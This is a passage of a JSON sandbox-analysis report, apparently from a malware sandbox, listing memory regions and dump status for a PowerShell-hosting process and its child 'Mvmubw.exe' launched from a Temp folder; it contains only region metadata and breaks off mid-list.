449380352, "timestamp": "00:01:02.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791371481088, "type": "region", "version": 1 }, "end_va": 8791387062271, "entry_point": 8791371481088, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_859", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791371481088, "timestamp": "00:01:02.013", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000860-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_860", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:01:02.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000861-addr_0x000007ff00040000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798382591, "entry_point": 0, "filename": null, "id": "region_861", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:02.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000862-addr_0x000007ff00050000-size_0x00000000000a0000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 8791798382592, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_862", "name": "private_0x000007ff00050000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798382592, "timestamp": "00:01:02.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000863-addr_0x000007ff000f0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799103487, "entry_point": 0, "filename": null, "id": "region_863", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:01:02.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000864-addr_0x000007ff00100000-size_0x0000000000070000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799103488, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_864", "name": "private_0x000007ff00100000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799103488, "timestamp": "00:01:02.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000865-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_865", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:02.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000866-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_866", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:02.017", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000867-addr_0x000007fffff00000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796091973632, "type": "region", "version": 1 }, "end_va": 8796092039167, "entry_point": 0, "filename": null, "id": "region_867", "name": "private_0x000007fffff00000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091973632, "timestamp": "00:01:02.053", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000868-addr_0x000007fffff10000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092628991, "entry_point": 0, "filename": null, "id": "region_868", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:02.053", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000869-addr_0x0000000002720000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 41025536, "type": "region", "version": 1 }, "end_va": 41091071, "entry_point": 0, "filename": null, "id": "region_869", "name": "private_0x0000000002720000", "norm_filename": null, "region_type": "private_memory", "start_va": 41025536, "timestamp": "00:01:02.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 456523776, "type": "region", "version": 1 }, "end_va": 459546623, "entry_point": 459205662, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_870", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 456523776, "timestamp": "00:01:02.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791344742400, "type": "region", "version": 1 }, "end_va": 8791355371519, "entry_point": 8791344742400, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_871", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791344742400, "timestamp": "00:01:02.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791365320704, "type": "region", "version": 1 }, "end_va": 8791366049791, "entry_point": 8791365320704, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_872", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791365320704, "timestamp": "00:01:02.471", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000873-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_873", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:01:02.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791332814848, "type": "region", "version": 1 }, "end_va": 8791344730111, "entry_point": 8791332814848, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_874", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791332814848, "timestamp": "00:01:02.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 41091072, "type": "region", "version": 1 }, "end_va": 41103359, "entry_point": 41091072, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_875", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 41091072, "timestamp": "00:01:02.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 459603968, "type": "region", "version": 1 }, "end_va": 460390399, "entry_point": 459603968, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_876", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 459603968, "timestamp": "00:01:02.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2003922943, "entry_point": 2003898476, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_877", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:01:02.608", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000878-addr_0x0000000002740000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41160703, "entry_point": 0, "filename": null, "id": "region_878", "name": "private_0x0000000002740000", "norm_filename": null, "region_type": "private_memory", "start_va": 41156608, "timestamp": "00:01:02.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 41308159, "entry_point": 41287680, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_879", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 41287680, "timestamp": "00:01:02.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41619455, "entry_point": 41353216, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_880", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 41353216, "timestamp": "00:01:02.693", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000881-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799627776, "type": "region", "version": 1 }, "end_va": 8791799693311, "entry_point": 0, "filename": null, "id": "region_881", "name": "private_0x000007ff00180000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799627776, "timestamp": "00:01:02.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 43253760, "type": "region", "version": 1 }, "end_va": 43286527, "entry_point": 43266094, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_882", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 43253760, "timestamp": "00:01:03.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 43319296, "type": "region", "version": 1 }, "end_va": 43323391, "entry_point": 0, "filename": null, "id": "region_883", "name": "pagefile_0x0000000002950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43319296, "timestamp": "00:01:03.086", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000884-addr_0x000000001b710000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 460390400, "type": "region", "version": 1 }, "end_va": 461438975, "entry_point": 0, "filename": null, "id": "region_884", "name": "private_0x000000001b710000", "norm_filename": null, "region_type": "private_memory", "start_va": 460390400, "timestamp": "00:01:03.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505885368, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_885", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:03.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791360274432, "type": "region", "version": 1 }, "end_va": 8791361212415, "entry_point": 8791360274432, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_886", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791360274432, "timestamp": "00:01:03.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791361257472, "type": "region", "version": 1 }, "end_va": 8791361953791, "entry_point": 8791361257472, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_887", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791361257472, "timestamp": "00:01:03.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791361978368, "type": "region", "version": 1 }, "end_va": 8791365312511, "entry_point": 8791361978368, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_888", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791361978368, "timestamp": "00:01:03.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791416373248, "type": "region", "version": 1 }, "end_va": 8791416578047, "entry_point": 8791416373248, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_889", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791416373248, "timestamp": "00:01:03.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791416635392, "type": "region", "version": 1 }, "end_va": 8791417065471, "entry_point": 8791416635392, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_890", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791416635392, "timestamp": "00:01:03.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 43384832, "type": "region", "version": 1 }, "end_va": 43388927, "entry_point": 0, "filename": null, "id": "region_891", "name": "pagefile_0x0000000002960000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43384832, "timestamp": "00:01:03.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820666128, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_892", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:03.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791356604416, "type": "region", "version": 1 }, "end_va": 8791356858367, "entry_point": 8791356604416, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_893", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791356604416, "timestamp": "00:01:03.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791356866560, "type": "region", "version": 1 }, "end_va": 8791358013439, "entry_point": 8791356866560, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_894", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791356866560, "timestamp": "00:01:03.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791358046208, "type": "region", "version": 1 }, "end_va": 8791360233471, "entry_point": 8791358046208, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_895", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791358046208, "timestamp": "00:01:03.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 43384832, "type": "region", "version": 1 }, "end_va": 43454463, "entry_point": 0, "filename": null, "id": "region_896", "name": "pagefile_0x0000000002960000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43384832, "timestamp": "00:01:03.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 45809664, "type": "region", "version": 1 }, "end_va": 46153727, "entry_point": 45809664, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_897", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 45809664, "timestamp": "00:01:03.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791322591232, "type": "region", "version": 1 }, "end_va": 8791324250111, "entry_point": 8791322591232, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_898", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791322591232, "timestamp": "00:01:03.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791324295168, "type": "region", "version": 1 }, "end_va": 8791325786111, "entry_point": 8791324295168, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_899", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791324295168, "timestamp": "00:01:03.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791325802496, "type": "region", "version": 1 }, "end_va": 8791332769791, "entry_point": 8791325802496, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_900", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791325802496, "timestamp": "00:01:03.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 43515904, "type": "region", "version": 1 }, "end_va": 43519999, "entry_point": 0, "filename": null, "id": "region_901", "name": "pagefile_0x0000000002980000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43515904, "timestamp": "00:01:03.812", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe\" ", "filename": "c:\\users\\adu0vk~1\\appdata\\local\\temp\\mvmubw.exe", "id": "proc_6", "image_name": "mvmubw.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00000975-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_975", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:25.702", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000976-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_976", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:25.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 